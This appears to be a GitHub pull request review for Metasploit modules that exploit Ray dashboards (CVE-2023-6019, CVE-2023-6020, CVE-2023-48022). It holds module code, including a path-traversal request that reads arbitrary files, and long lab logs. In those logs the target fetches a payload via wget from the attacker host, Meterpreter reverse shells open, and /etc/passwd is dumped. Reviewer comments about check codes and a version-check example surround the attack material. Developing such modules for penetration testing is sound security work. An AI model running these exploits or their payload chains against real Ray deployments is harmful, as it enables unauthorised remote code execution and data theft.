Add Ray module (CVE-2023-6019, CVE-2023-6020, CVE-2023-48022) #19363
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], | ||
[ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ] | ||
], | ||
'DefaultOptions' => { 'MeterpreterTryToFork' => true }, |
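Review bot: `'DefaultOptions' => { 'MeterpreterTryToFork' => true }` is set without any comment in the module on why it is needed; the test logs later in this thread (a session with `MeterpreterTryToFork false` closing with "Reason: Died", and the follow-up commit "use MeterpreterTryToFork to avoid a meterpreter session get killed") show the reason, so a one-line comment next to the default stating that the spawned job's process is otherwise torn down would save the next reader the same question.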
Is this required to be true? Or why is it explicitly set as a default here?
Thank you! See c71894f.
register_options( | ||
[ | ||
Opt::RPORT(8265), | ||
OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2023-6019', ['CVE-2023-6019', 'RCE', 'CVE-2023-6020']]), |
I think this option is a little confusing, mixing CVE-XXXX-XXXX and just RCE. I also wouldn't necessarily expect users to know which CVE they want to target; is there a more descriptive (but still short 😅) name we can use instead?
Thank you! See b7e4247.
OptString.new('COMMAND', [ true, 'The command to execute', 'echo \'Hello from Metasploit\'' ]), | ||
OptString.new('FILEPATH', [ true, 'File to read', '/etc/passwd']) |
OptString.new('COMMAND', [ true, 'The command to execute', 'echo \'Hello from Metasploit\'' ]), | |
OptString.new('FILEPATH', [ true, 'File to read', '/etc/passwd']) | |
OptString.new('COMMAND', [ false, 'The command to execute', 'echo \'Hello from Metasploit\'' ]), | |
OptString.new('FILEPATH', [ false, 'File to read', '/etc/passwd']) |
I don't think both of these options are always required, depending on the selected CVE/RCE; it wouldn't be clear to a user in which scenario each option is used either. It may be better not to mark them required and to add checks on the code paths where you are going to use that option. Not super opinionated on this though, just throwing it out there.
@file_content = lfi | ||
return Exploit::CheckCode::Safe if @file_content.nil? | ||
end | ||
Exploit::CheckCode::Appears |
I don't think this check is strict enough for Appears; maybe Detected. But ideally, if we can get a version number or something, that'd be fantastic; just getting a response with data doesn't guarantee we're targeting the correct or a vulnerable service.
Thank you! See 92e2694.
@job_data = get_job_data(datastore['COMMAND']) | ||
return Exploit::CheckCode::Safe if @job_data.nil? | ||
when 'CVE-2023-6020' | ||
@file_content = lfi |
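Review bot: `get_job_data(datastore['COMMAND'])` inside `check` means that with AutoCheck enabled the user's COMMAND is submitted to the target as a job during the check, before the exploit phase even starts; a check should use a fixed, harmless probe (or a version lookup) and leave `datastore['COMMAND']` to the exploit path, otherwise a `check` run alone already has the full side effect of `exploit`.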
I think this is actually performing the exploit, right? If that's right, it could return a Vulnerable check code: https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-check-method.html#check-codes
Thank you! See 4e99e7d.
<=v2.6.3 == <v2.8.1
Offhand, this appears to be three different exploits in one module; is there a reason we should have them combined like this, or would it make sense to separate them into different modules to make searching and tracking easier?
Thank you for your comment!
Hello! Thanks for splitting the modules. I've left a couple of comments.
auxiliary(gather/ray_lfi_cve_2023_602)
[*] Running module against 172.17.0.2
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
ray:x:1000:100::/home/ray:/bin/bash
[*] Auxiliary module execution completed
exploit(linux/http/ray_agent_job_rce)
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[+] Command execution successful. Job ID: 'raysubmit_Phm3XWUNTFt8Wctn' Submission ID: 'raysubmit_Phm3XWUNTFt8Wctn'
[*] Using URL: http://172.17.0.1:8080/fXdFxWa
[*] Command Stager progress - 100.00% done (110/110 bytes)
[*] Client 172.17.0.2 (Wget/1.20.3 (linux-gnu)) requested /fXdFxWa
[*] Sending payload to 172.17.0.2 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:37352) at 2024-08-19 05:37:59 -0400
[*] Server stopped.
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: ray
meterpreter >
exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019)
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[+] Grabbed node info, pid: 152, ip: 172.17.0.2
[*] Using URL: http://172.17.0.1:8080/J5281SDU
[*] Client 172.17.0.2 (Wget/1.20.3 (linux-gnu)) requested /J5281SDU
[*] Sending payload to 172.17.0.2 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 2 opened (172.17.0.1:4444 -> 172.17.0.2:44864) at 2024-08-19 06:16:38 -0400
[*] Command Stager progress - 100.00% done (111/111 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: ray
meterpreter >
def check | ||
@file_content = lfi | ||
return Exploit::CheckCode::Safe if @file_content.nil? | ||
|
||
Exploit::CheckCode::Vulnerable | ||
end |
I think the check method result should not be controlled by the 'FILEPATH' content.
msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > set filepath /totally/not/a/goodpath
filepath => /totally/not/a/goodpath
msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > check
[*] 172.17.0.2:8265 - The target is not exploitable.
msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > set filepath /etc/passwd
filepath => /etc/passwd
msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > check
[+] 172.17.0.2:8265 - The target is vulnerable.
msf6 auxiliary(gather/ray_lfi_cve_2023_6020)
After some investigation on the Ray website, I have found a REST API endpoint that shares the version number with us.
def check | |
@file_content = lfi | |
return Exploit::CheckCode::Safe if @file_content.nil? | |
Exploit::CheckCode::Vulnerable | |
end | |
def check | |
res = send_request_cgi({ | |
'method' => 'GET', | |
'uri' => normalize_uri(target_uri.path, 'api/version') | |
}) | |
return Exploit::CheckCode::Unknown unless res && res.code == 200 | |
ray_version = res.get_json_document['ray_version'] | |
return Exploit::CheckCode::Unknown unless ray_version | |
return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3') | |
return Exploit::CheckCode::Appears | |
end |
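Review bot: `Rex::Version.new(ray_version)` raises ArgumentError on a string that is not a version number (Rex::Version is a Gem::Version subclass), so a dashboard that returns something unexpected in `ray_version` would make `check` crash instead of returning `Unknown`; either validate the string before the comparison or rescue ArgumentError around it and return `Exploit::CheckCode::Unknown`. The same applies if the body parses as JSON but not as an object, since `get_json_document` returns an empty hash only on a parse error, not on an array.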
By looking at our documentation, the Exploit::CheckCode::Vulnerable code is used when we have proof we actually exploited the target. If you also want to add this, I may suggest modifying the lfi function to accept a filepath parameter to interpolate in the uri. Then when we execute the check we will pass /etc/passwd, which should be ok on every system. In the exploit we will pass the datastore['FILEPATH'] value.
def check
...
return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3')
@file_content = lfi('/etc/passwd')
return Exploit::CheckCode::Vulnerable unless @file_content.nil?
return Exploit::CheckCode::Appears
end
def lfi(filepath)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{filepath}")
})
return unless res && res.code == 200
res.body
end
def run
@file_content ||= lfi(datastore['FILEPATH'])
fail_with(Failure::Unknown, 'Failed to execute LFI') unless @file_content
print_good("#{datastore['FILEPATH']}\n#{@file_content}")
end
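To make the version gate proposed above concrete, here is an added, stand-alone Ruby example; it is not part of the PR or of Metasploit. It uses Gem::Version (Rex::Version is a thin subclass of it) over constructed sample bodies for GET /api/version and maps each outcome to the same three buckets the suggested check uses (Unknown, Safe, Appears), so that an unreachable host, a non-Ray service, a missing `ray_version` field, a JSON array or a malformed version string all land in Unknown rather than Safe, and no user-controlled option such as FILEPATH takes part in the decision. The sample responses and the `classify_ray_version` / `classify_samples` helper names are assumptions made for this example.

```ruby
require 'rubygems'
require 'json'

# Constructed sample responses (status, body) standing in for what a Ray
# dashboard answers to GET /api/version. The endpoint and the 'ray_version'
# key come from the review above; every body below is made up for this example.
SAMPLE_RESPONSES = {
  'vulnerable'  => [200, '{"version":"2.6.3","ray_version":"2.6.3","ray_commit":"0000000"}'],
  'patched'     => [200, '{"version":"2.8.1","ray_version":"2.8.1"}'],
  'dev_build'   => [200, '{"ray_version":"2.6.3.dev0"}'],
  'not_ray'     => [200, '<html><body>Welcome to nginx!</body></html>'],
  'no_field'    => [200, '{"version":"unknown"}'],
  'json_array'  => [200, '[1, 2, 3]'],
  'bad_version' => [200, '{"ray_version":"not-a-version"}'],
  'unreachable' => [nil, nil]
}.freeze

# Highest release inside the affected range discussed on this page (Ray <= 2.6.3).
LAST_AFFECTED = Gem::Version.new('2.6.3')

# Classifies one HTTP answer into the three buckets the proposed check uses.
#   :unknown  - could not determine (no answer, not JSON, no usable version)
#   :safe     - a version outside the affected range was positively reported
#   :appears  - the reported version is inside the affected range
# Nothing user-controlled (such as a FILEPATH option) takes part in the decision.
def classify_ray_version(status, body, last_affected: LAST_AFFECTED)
  return :unknown unless status == 200 && body.is_a?(String)

  doc = begin
    JSON.parse(body)
  rescue JSON::ParserError
    nil
  end
  # A JSON array or scalar is not a version document either.
  return :unknown unless doc.is_a?(Hash)

  raw = doc['ray_version']
  return :unknown unless raw.is_a?(String) && !raw.strip.empty?

  # Gem::Version (which Rex::Version subclasses) raises ArgumentError on
  # strings that are not version numbers; treat that as "could not determine".
  version = begin
    Gem::Version.new(raw.strip)
  rescue ArgumentError
    return :unknown
  end

  # Pre-release builds such as 2.6.3.dev0 sort below 2.6.3 and stay in range.
  version <= last_affected ? :appears : :safe
end

# Runs the classifier over every constructed sample and returns name => bucket.
def classify_samples(samples = SAMPLE_RESPONSES)
  samples.transform_values { |(status, body)| classify_ray_version(status, body) }
end

if __FILE__ == $PROGRAM_NAME
  classify_samples.each { |name, bucket| puts format('%-12s %s', name, bucket) }
end
```

The split between "could not determine" and "positively unaffected" is the point: with AutoCheck enabled, a Safe result aborts the module unless ForceExploit is set, so every failure mode that is not a confirmed patched version should fall into Unknown.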
def check | ||
@job_data = get_job_data('ls') | ||
return Exploit::CheckCode::Safe if @job_data.nil? | ||
|
||
Exploit::CheckCode::Detected | ||
end |
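Review bot: `get_job_data('ls')` submits a job to the target, so a non-nil `@job_data` is already proof of execution and, per the check-code guide linked earlier in this thread, that is `Vulnerable` rather than `Detected`; if the intent is a non-intrusive check, query `/api/version` as suggested for the LFI module and keep job submission for `exploit`. Separately, a nil from `get_job_data` can mean a network or parsing failure as easily as a patched target, so `Unknown` fits that branch better than `Safe`.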
Here we can do the same to check also the version from /api/version
Thank you! See 5be7e09.
def check | ||
@nodes = get_nodes | ||
return Exploit::CheckCode::Safe if @nodes.nil? | ||
|
||
Exploit::CheckCode::Detected | ||
end |
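Review bot: `return Exploit::CheckCode::Safe if @nodes.nil?` maps every failure of `get_nodes` (connection error, non-JSON body, a different service on the port) to Safe, which is a false negative that AutoCheck then refuses to override without ForceExploit; `Unknown` is the documented code for "could not determine", and `Safe` should be reserved for a response that positively identifies an unaffected version.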
Same as the other check methods in the PR.
Thank you! See a5b9d55.
Avoid check method being controlled by the 'FILEPATH' content Co-authored-by: Diego Ledda <[email protected]>
Hello @Takahiro-Yoko, I've spent some time determining whether all versions of ray are vulnerable to the 3 modules; I've left some comments.
Ray 2.1.0
msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > exploit
[*] Running module against 172.17.0.2
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
ray:x:1000:100::/home/ray:/bin/bash
[*] Auxiliary module execution completed
msf6 auxiliary(gather/ray_lfi_cve_2023_6020) >
Target: Linux x64
msf6 exploit(linux/http/ray_agent_job_rce) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_6n9HLxEzBBPSSgpW' Submission ID: 'raysubmit_6n9HLxEzBBPSSgpW'
[*] Using URL: http://172.17.0.1:8080/virV1DEcQq
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Client 172.17.0.2 (Wget/1.20.3 (linux-gnu)) requested /virV1DEcQq
[*] Sending payload to 172.17.0.2 (Wget/1.20.3 (linux-gnu))
[*] Meterpreter session 7 opened (172.17.0.1:4444 -> 172.17.0.2:60042) at 2024-08-20 08:36:35 -0400
[*] Server stopped.
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: ray
meterpreter >
Target: Linux Command
msf6 exploit(linux/http/ray_agent_job_rce) > set MeterpreterTryToFork false
MeterpreterTryToFork => false
msf6 exploit(linux/http/ray_agent_job_rce) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_dgaPjrTfYmN47PUL' Submission ID: 'raysubmit_dgaPjrTfYmN47PUL'
[*] Meterpreter session 2 opened (172.17.0.1:4444 -> 172.17.0.2:49686) at 2024-08-21 04:57:42 -0400
meterpreter >
[*] 172.17.0.2 - Meterpreter session 2 closed. Reason: Died
msf6 exploit(linux/http/ray_agent_job_rce) > set MeterpreterTryToFork true
MeterpreterTryToFork => true
msf6 exploit(linux/http/ray_agent_job_rce) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_bDNJAr34dgvyJuJn' Submission ID: 'raysubmit_bDNJAr34dgvyJuJn'
[*] Meterpreter session 3 opened (172.17.0.1:4444 -> 172.17.0.2:53602) at 2024-08-21 04:59:00 -0400
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > exploit
[*] Started reverse TCP handler on 192.168.136.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[-] Exploit aborted due to failure: unknown: Failed to get pid
[*] Exploit completed, but no session was created.
Ray 2.3.1
msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > exploit
[*] Running module against 172.17.0.2
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
ray:x:1000:100::/home/ray:/bin/bash
[*] Auxiliary module execution completed
msf6 auxiliary(gather/ray_lfi_cve_2023_6020) >
Target: Linux x64
msf6 exploit(linux/http/ray_agent_job_rce) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_WbqC47ujqrjf1Ve9' Submission ID: 'raysubmit_WbqC47ujqrjf1Ve9'
[*] Using URL: http://172.17.0.1:8080/BL9y0RF
[*] Command Stager progress - 100.00% done (110/110 bytes)
[*] Client 172.17.0.2 (Wget/1.20.3 (linux-gnu)) requested /BL9y0RF
[*] Sending payload to 172.17.0.2 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 8 opened (172.17.0.1:4444 -> 172.17.0.2:47238) at 2024-08-21 06:12:11 -0400
[*] Server stopped.
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: ray
meterpreter >
Target: Linux Command
msf6 exploit(linux/http/ray_agent_job_rce) > set MeterpreterTryToFork false
MeterpreterTryToFork => false
msf6 exploit(linux/http/ray_agent_job_rce) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_TEwTk4CWHtqqHW6R' Submission ID: 'raysubmit_TEwTk4CWHtqqHW6R'
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 10 opened (172.17.0.1:4444 -> 172.17.0.2:35420) at 2024-08-21 06:26:05 -0400
meterpreter >
[*] 172.17.0.2 - Meterpreter session 10 closed. Reason: Died
msf6 exploit(linux/http/ray_agent_job_rce) > set MeterpreterTryToFork true
MeterpreterTryToFork => true
msf6 exploit(linux/http/ray_agent_job_rce) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_ivTiipLc6w11XLBJ' Submission ID: 'raysubmit_ivTiipLc6w11XLBJ'
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 11 opened (172.17.0.1:4444 -> 172.17.0.2:50012) at 2024-08-21 06:26:18 -0400
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
Target: Linux x64
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > exploit
[*] Started reverse TCP handler on 192.168.136.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Grabbed node info, pid: 300, ip: 172.17.0.2
[*] Using URL: http://192.168.136.128:8080/itqLW6vGVProd
[*] Client 172.17.0.2 (Wget/1.20.3 (linux-gnu)) requested /itqLW6vGVProd
[*] Sending payload to 172.17.0.2 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 4 opened (192.168.136.128:4444 -> 172.17.0.2:55988) at 2024-08-21 05:03:34 -0400
[*] Command Stager progress - 100.00% done (121/121 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
Target: Linux Command
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > exploit
[*] Started reverse TCP handler on 192.168.136.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Grabbed node info, pid: 300, ip: 172.17.0.2
[*] Meterpreter session 6 opened (192.168.136.128:4444 -> 172.17.0.2:51402) at 2024-08-21 05:17:55 -0400
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb
use MeterpreterTryToFork to avoid a meterpreter session get killed Co-authored-by: Diego Ledda <[email protected]>
Retested after the changes; looks good to me.
Ray 2.1.0
msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > exploit
[*] Running module against 172.17.0.2
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
ray:x:1000:100::/home/ray:/bin/bash
[*] Auxiliary module execution completed
msf6 auxiliary(gather/ray_lfi_cve_2023_6020) >
msf6 exploit(linux/http/ray_agent_job_rce) > exploit
[*] Started reverse TCP handler on 192.168.136.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_VHBcw3tC9m2YYN5A' Submission ID: 'raysubmit_VHBcw3tC9m2YYN5A'
[*] Using URL: http://192.168.136.128:8080/NXNvvzJ3oDsc
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Client 172.17.0.2 (Wget/1.20.3 (linux-gnu)) requested /NXNvvzJ3oDsc
[*] Sending payload to 172.17.0.2 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (192.168.136.128:4444 -> 172.17.0.2:39158) at 2024-08-22 07:09:14 -0400
[*] Server stopped.
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) >
Ray 2.6.3
msf6 auxiliary(gather/ray_lfi_cve_2023_6020) > exploit
[*] Running module against 172.17.0.2
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
ray:x:1000:100::/home/ray:/bin/bash
[*] Auxiliary module execution completed
msf6 exploit(linux/http/ray_agent_job_rce) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_5LN2YnQEDWND4AVY' Submission ID: 'raysubmit_5LN2YnQEDWND4AVY'
[*] Using URL: http://172.17.0.1:8080/MXVQj1BVgBh5io
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Client 172.17.0.2 (Wget/1.20.3 (linux-gnu)) requested /MXVQj1BVgBh5io
[*] Sending payload to 172.17.0.2 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:55568) at 2024-08-22 07:29:11 -0400
[*] Server stopped.
meterpreter > exit
[*] Shutting down session: 1
[*] 172.17.0.2 - Meterpreter session 1 closed. Reason: User exit
msf6 exploit(linux/http/ray_agent_job_rce) > set TARGET "Linux Command"
TARGET => Linux Command
msf6 exploit(linux/http/ray_agent_job_rce) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Command execution successful. Job ID: 'raysubmit_sgngzv1zQSYCVygq' Submission ID: 'raysubmit_sgngzv1zQSYCVygq'
[*] Meterpreter session 2 opened (172.17.0.1:4444 -> 172.17.0.2:52180) at 2024-08-22 07:29:54 -0400
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Grabbed node info, pid: 154, ip: 172.17.0.2
[*] Meterpreter session 3 opened (172.17.0.1:4444 -> 172.17.0.2:40380) at 2024-08-22 07:31:32 -0400
meterpreter > exit
[*] Shutting down session: 3
[*] 172.17.0.2 - Meterpreter session 3 closed. Reason: User exit
